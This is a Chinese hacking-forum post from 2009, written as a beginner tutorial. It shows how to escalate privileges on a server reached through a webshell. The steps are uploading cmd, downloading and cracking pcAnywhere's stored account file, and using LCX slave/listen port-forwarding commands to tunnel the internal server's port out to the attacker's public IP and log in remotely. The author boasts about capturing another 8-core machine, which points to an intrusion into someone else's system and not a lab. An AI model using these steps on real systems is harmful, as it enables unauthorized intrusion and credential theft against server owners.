|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
+ i' G: m# A9 ?7 ]; n
" o1 j6 t4 j: z8 J+ X0 J! ?8 @ s5 A提权方法:pcanywhere+LCX5 G/ e( M: M% g/ t: B5 J
) l; u* M' y2 _+ S% W获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
: ^/ I, O, G% f, z% R+ F3 b' t; ~9 `9 S8 K$ {) U0 G
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
# d$ ]; l, x6 I
" L, |2 O9 T% K: ^
: e0 }: P3 H( }. n. P查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
( {* t* ]0 A; K( O3 n0 P1 O9 h, O. B5 x3 P
2 M4 d: p7 _* V+ g0 M5 L/ y; P
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
L/ v& e( A5 Z- E, w2 y, h5 S" ^! m; W4 Y+ z7 ?# u0 H) Q( w- j
- r/ A6 G. A, e1 U0 B" l( o N. |. e. u/ E
3 n4 I4 B( a* P0 Y* i9 K! n由于服务器在内网,那我们就要做端口转发,又要用到LCX啦`` L& F7 s3 W+ `; W; c& G' Q
" J4 m6 a5 T7 O! n3 D; L" T$ P* M5 @8 q/ ]8 ^7 s z9 Z
LCX的用法再简单说下:
/ u: Z1 ?9 |; X& ^8 y( |1 @- N, C3 L- f6 K9 Z$ J8 o
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
3 `+ m! g5 E2 Y( q# f
1 u, ]# d& b9 s本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
9 h8 f4 ^( Y; U3 K
( I5 J8 r% L8 ~. P+ r: h0 w6 w# c由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。1 G6 u4 z$ [0 M8 q" f
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
9 W3 h- _0 m: {! p" j
: _3 j9 K2 l" x! K, r; B% p% v- o! } \) B/ S: w
9 K; Q) W6 ?* f
, @' Y2 Q9 B+ l9 A+ }呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
- y" K" P5 X, B% \3 c( h$ ]. z" q0 r5 m
* J. e; h, d3 t5 s( b" i& ?3 I2 q
# D3 e- \0 m/ @/ I0 `& c+ p
1 k% J5 |; w+ ~7 f3 A7 n8 S7 q% ]
我们本地连接试试,输入我们刚破解的账号密码3 h) J* O$ {3 u* D: `9 T p# Z9 _/ D) h- R
. H: A" o7 H1 R! d. L2 x& L% K( e7 D/ [/ d
呵呵``连接成功,服务器不错,又一个8核^︵^# k8 q- @; }" _& b1 B& J7 b
1 U b3 ~1 m# W3 r- s$ @
, x2 s. l% K0 A: r, P. V, }. | N: V8 |5 j
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
